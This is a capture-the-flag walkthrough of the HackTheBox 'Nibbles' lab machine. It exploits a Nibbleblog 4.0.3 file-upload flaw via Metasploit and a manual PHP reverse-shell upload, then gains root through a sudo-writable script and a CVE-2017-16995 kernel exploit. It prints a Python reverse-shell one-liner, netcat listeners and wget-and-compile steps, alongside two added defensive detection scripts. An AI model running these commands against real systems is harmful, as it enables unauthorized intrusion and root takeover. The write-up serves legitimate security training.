Nibbles HackTheBox WalkThrough


This is the Nibbles HackTheBox machine walkthrough, the 15th machine of our OSCP-like HTB boxes series. In this writeup I have demonstrated step by step how I rooted the Nibbles HTB machine in two different ways: one using Metasploit and the other without it. Before starting, let us know something about this machine. It is a Linux box with IP address 10.10.10.75 and a difficulty of easy assigned by its maker.

This machine is currently retired, so you will require a VIP subscription at hackthebox.eu to access it. First of all, connect your PC to the HackTheBox VPN and confirm your connectivity with the Nibbles machine by pinging IP 10.10.10.75. If all goes well, start hacking. As usual, I started by scanning the machine. I used Nmap [a port scanner] for this task and the result is below.

Scanning

$ nmap -sC -sV -oN Nibbles.nmap 10.10.10.75

Performing nmap scan in Nibbles HackTheBox WalkThrough

Nmap revealed two open ports. OpenSSH is running on port 22 and an Apache2 web server is running on port 80. Since port 80 is open, a website should be running on it, reachable at http://10.10.10.75. Going to this website I found a blank page containing the two words "Hello World!" and nothing else. As usual, I checked the page source for a hint in the comments and luckily this time found an interesting one. The comment contains a URI of this website, /nibbleblog/.

Comment on Nibbles Web page

Now we have a new URL to explore, viz. http://10.10.10.75/nibbleblog/. This URL has the Nibbleblog CMS installed. Whenever I find a CMS, my next step is to check whether it is open source or closed source, find its version number, and then search exploit-db for available vulnerabilities and exploits using searchsploit. If it is an open source CMS we can simply get its source code from GitHub and check its directory structure as well as its file and folder names. This saves us from brute-forcing files and folders on the target website. We can also check the website for the particular files we see on GitHub.

Default web page of Nibbleblog CMS

A simple Google search revealed that it is an open source CMS and that its source code is on GitHub. After some further enumeration I got the version of this CMS at http://10.10.10.75/nibbleblog/update.php.

Update page of nibbleblog CMS in Nibbles HackTheBox WalkThrough

So we have Nibbleblog v4.0.3. Now we can simply search for available exploits for this version through searchsploit (a tool to query exploit-db).

Searching for available exploit

$ searchsploit nibbleblog 4.0.3

Searching for available exploit of nibbleblog during Nibbles HackTheBox WalkThrough

Searchsploit revealed that this version is affected by an Arbitrary File Upload vulnerability and that a Metasploit module is also available for it. Let us check the requirements of this module and exploit the vulnerability using Metasploit.

$ sudo msfdb run

msf6 > search nibbleblog

msf6 > info exploit/multi/http/nibbleblog_file_upload

Checking the exploit info in metasploit during Nibbles HackTheBox WalkThrough

The Metasploit module is exploit/multi/http/nibbleblog_file_upload. It requires a username and password to work, but we have not enumerated any credentials so far. Since this is a CMS, just like WordPress, there should also be a login panel used to manage the website. After some more enumeration I found the login panel at http://10.10.10.75/nibbleblog/admin.php. I tried some default credentials like admin:admin, admin:password and admin:nibbles, and luckily admin:nibbles worked. So we have the credentials of the admin user. Now we can exploit this vulnerability using Metasploit to gain access to the Nibbles box. I exploited it in two different ways, first through Metasploit and second without it. Let us get a user shell using Metasploit.

Getting User Shell Using Metasploit – Method 1

msf6 > use exploit/multi/http/nibbleblog_file_upload

msf6 exploit(multi/http/nibbleblog_file_upload) > set PAYLOAD php/meterpreter/reverse_tcp

msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75

msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.14.3

msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/

msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin

msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles

msf6 exploit(multi/http/nibbleblog_file_upload) > exploit

Getting user shell through metasploit via method 1

We have got a user shell using Metasploit. Let us now exploit this vulnerability without Metasploit. You can get more information about this vulnerability and its PoC from here. According to this file upload vulnerability, an attacker can upload any malicious script through the My Image plugin and execute it, because any file uploaded through the My Image plugin is saved with its original extension. Check this snippet from curesec.com.

Exploit snippet from the website curesec.com
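As an added detection example (not code from the original writeup), the following Python script scans constructed Apache access-log lines for the trace this vulnerability leaves on the server side: a successful request for a PHP file under the plugin upload directory, optionally correlated with an earlier POST to admin.php from the same IP. The query string on the admin.php POST, the sample IPs and the timestamps are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed Apache combined-log sample (not captured from the box); the query
# string on the admin.php POST is an assumption about the plugin config form.
SAMPLE_LOG = """\
10.10.14.3 - - [10/Mar/2024:12:00:01 +0000] "GET /nibbleblog/admin.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.3 - - [10/Mar/2024:12:00:40 +0000] "POST /nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image HTTP/1.1" 200 410 "-" "Mozilla/5.0"
10.10.14.3 - - [10/Mar/2024:12:01:05 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 200 0 "-" "curl/7.68.0"
10.10.14.7 - - [10/Mar/2024:12:05:00 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.jpg HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
10.10.14.9 - - [10/Mar/2024:13:00:00 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
UPLOAD_DIR = "/nibbleblog/content/private/plugins/"  # where plugin uploads are stored
ADMIN_PATH = "/nibbleblog/admin.php"                 # where the upload form is submitted
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5")   # extensions Apache would execute


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def find_uploaded_script_hits(log_text, window_seconds=600):
    """Return (ip, path, correlated) for every successful request that executes a
    script inside the plugin upload directory. `correlated` is True when the same IP
    POSTed to admin.php within the window beforehand (upload followed by execution)."""
    window = timedelta(seconds=window_seconds)
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    admin_posts = [(e["ip"], e["ts"]) for e in events
                   if e["method"] == "POST" and e["path"].startswith(ADMIN_PATH)]
    hits = []
    for e in events:
        path = e["path"].split("?", 1)[0]          # drop any query string
        if e["status"] != 200 or not path.startswith(UPLOAD_DIR):
            continue
        if not path.lower().endswith(SCRIPT_EXTS):  # image.jpg is normal traffic
            continue
        correlated = any(ip == e["ip"] and timedelta(0) <= e["ts"] - ts <= window
                         for ip, ts in admin_posts)
        hits.append((e["ip"], path, correlated))
    return hits
```

A hardened deployment would additionally stop Apache from executing scripts under content/private/ at all, so that the same log line would show a download rather than a 200 with empty body.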

Getting User Shell Without Metasploit – Method 2

To get a user shell, do the following.

1. Log in to the admin panel at http://10.10.10.75/nibbleblog/admin.php using the credentials admin:nibbles.

2. Click on Plugins in the left pane and click on Configure under the My Image plugin name.

3. Upload php-reverse-shell.php and click on Save changes to apply the changes. The PHP reverse shell can be found in the directory /usr/share/webshells/php/. Don't forget to replace the IP address in the shell with your tun0 IP before uploading.

4. Start a netcat listener on the Kali machine to accept the reverse connection from this PHP shell.

5. Access the URL http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php to execute the shell. That's all, you will have a shell now.

1. Log in to the admin panel

Nibbleblog Admin dashboard after getting login

2. Click on plugins and then Configure under My Image

nibbleblog-plugin web page found during Nibbles hackthebox walkthrough

3. Upload the shell.

Uploading the webshell in Nibbleblog plugin section

4. Start netcat listener

$ nc -nvlp 8888

5. Execute the uploaded shell

$ curl http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php

6. Check the user and its ID after getting the shell.

$ whoami && id

Getting user shell via method 2 without Metasploit in Nibbles HackTheBox Walkthrough

We have got a user shell. Let us upgrade it to a fully interactive Linux shell so that we can run more advanced Linux commands through it.

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm

$ ^Z #Press CTRL+Z to background the shell

$ stty raw -echo

$ fg # And press enter twice to foreground the shell

Upgrading the shell to fully qualified linux shell

Capture User Flag

$ cat /home/nibbler/user.txt

Capturing user flag in Nibbles Hackthebox walkthrough

Privilege Escalation

To escalate privileges to root we first have to find a privilege escalation vector. There are two ways to find one: either use post-exploitation enumeration scripts like LinPEAS, LinEnum, linux-exploit-suggester, etc., or enumerate manually.

Finding PrivEsc Vector

The sudo -l command revealed that user nibbler can run monitor.sh as root without a password, which means that any command requiring root privileges, if put inside the script monitor.sh, can be executed by user nibbler without being asked for a password. For example, if we put a command like sudo python3 inside this file and then run the script as root, it won't ask for a password.

$ sudo -l

Sudo -l command output

The monitor.sh file is present inside the personal.zip archive, so we have to unzip personal.zip to execute the monitor.sh script. If you don't want to unzip this archive you can simply create another monitor.sh file inside the directory personal/stuff/, but you also have to create the personal and stuff folders because they are not present beforehand. I am going to use the same monitor.sh which I got after unzipping personal.zip.

$ unzip personal.zip

Unzipping personal.zip file

The monitor.sh script can be read, written and executed by user nibbler because it has rwx permissions.

$ find . -ls

Checking the permission of file monitor.sh

Since user nibbler can modify this file, he can also put reverse shell code into it, and if the file is run as root then the reverse shell code will also execute as root and we get a shell on our netcat listener. I did exactly that and got a root shell. So here our privilege escalation vector is getting root by sudo right exploitation.
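As an added defender-side check (not the author's code), this Python audit parses `sudo -l` output and, for each command a user may run as root, walks the command's path looking for a file or ancestor directory the invoking user can write. That covers both situations described above: the unpacked monitor.sh being writable, and the rule pointing at a not-yet-existing personal/stuff/monitor.sh that the user could create. The sample sudo -l text is constructed and the paths it names are assumptions.

```python
import os
import re
import stat

# One rule line of `sudo -l` output, e.g. "(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh"
SUDO_RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')


def parse_sudo_l(output):
    """Yield (run_as_user, nopasswd, command_path) for each command in `sudo -l` output."""
    for line in output.splitlines():
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD" in m.group("tags")
        for cmd in m.group("cmds").split(","):
            yield m.group("runas").strip(), nopasswd, cmd.strip().split()[0]


def writable_by(st, uid, gids):
    """Mode-bit check: may uid (member of gids) write the inode described by `st`?"""
    if st.st_uid == uid:
        return bool(st.st_mode & stat.S_IWUSR)
    if st.st_gid in gids:
        return bool(st.st_mode & stat.S_IWGRP)
    return bool(st.st_mode & stat.S_IWOTH)


def audit_rule(cmd_path, uid, gids, trusted_root="/"):
    """Walk from the sudo target up to trusted_root; return the first component the user
    can modify. A writable file can be edited (the monitor.sh case); a writable ancestor
    lets the user replace or create it. Sticky dirs like /tmp are skipped (no renames there)."""
    path = cmd_path
    while path not in (trusted_root, "/"):
        if os.path.lexists(path):
            st = os.lstat(path)
            sticky = stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX and st.st_uid != uid
            if not sticky and writable_by(st, uid, gids):
                return path
        path = os.path.dirname(path)
    return None


def audit_sudo_output(output, uid, gids, trusted_root="/"):
    """Return (run_as, nopasswd, command, writable_component) for every rule the user could abuse."""
    findings = []
    for run_as, nopasswd, cmd in parse_sudo_l(output):
        if not cmd.startswith("/"):  # "ALL" or similar: nothing on disk to check
            continue
        hit = audit_rule(cmd, uid, gids, trusted_root)
        if hit:
            findings.append((run_as, nopasswd, cmd, hit))
    return findings
```

The fix on the box side is the usual one: the sudo target must be owned by root and sit in a root-owned path, with no write bit for the user the rule is granted to.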

This box is also vulnerable to a kernel exploit, which I came to know when I ran linux-exploit-suggester to find a privilege escalation vector. For more information about this kernel exploit check CVE-2017-16995. So we also have two ways to root this box, and that is what we are going to do next: first by using sudo right exploitation and second by using the kernel exploit.

Linux-Exploit-Suggester result in Nibbles htb writeup

Getting Root Shell via Sudo Right Exploitation – Method 1

To get a root shell I did the following.

On Kali Machine

1. Started netcat listener.

$ nc -nvlp 1234

On Nibbles Machine

2. Changed directory to personal/stuff/ [Make sure you have already extracted personal.zip or created the file monitor.sh]

3. Put the following reverse shell code into monitor.sh

sudo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

4. Executed the script as root. Ignore the connection time-out error.

$ cd personal/stuff/

$ nano monitor.sh

$ grep -i "sudo python3" monitor.sh

$ sudo -u root ./monitor.sh

Getting root shell in nibbles htb via method 1

We are root now.

Getting Root Shell via Kernel Exploit – Method 2

To get a root shell via the kernel exploit I did the following.

On Kali Machine

1. Downloaded the exploit from exploit-db.

2. Started a Python HTTP server to host this file.

$ curl https://www.exploit-db.com/download/45010 -o exploit.c

$ sudo python3 -m http.server 80

Downloading the exploit on my local Kali machine

On Nibbles Machine

3. Changed directory to the publicly writable directory /dev/shm

4. Downloaded the exploit from my Kali machine

5. Compiled the exploit

6. Finally ran it.

$ cd /dev/shm

$ wget http://10.10.14.3/exploit.c

$ gcc exploit.c

$ ./a.out

# whoami

Getting root shell in nibbles htb via method 2

We have successfully got root. Let us capture the root flag.

Capture Root Flag

# cat /root/root.txt

Capturing root flag in Nibbles Hackthebox walkthrough

This was how I rooted the Nibbles HackTheBox machine. I learnt a lot during this challenge and hope you have also learnt something new. Thanks for reading this walkthrough. Share your experience in the comment section. For any query or suggestion about the writeup feel free to write to us at [email protected].


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec Consultant by day and a Bug Bounty Hunter & CTF player by night. Sometimes I write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/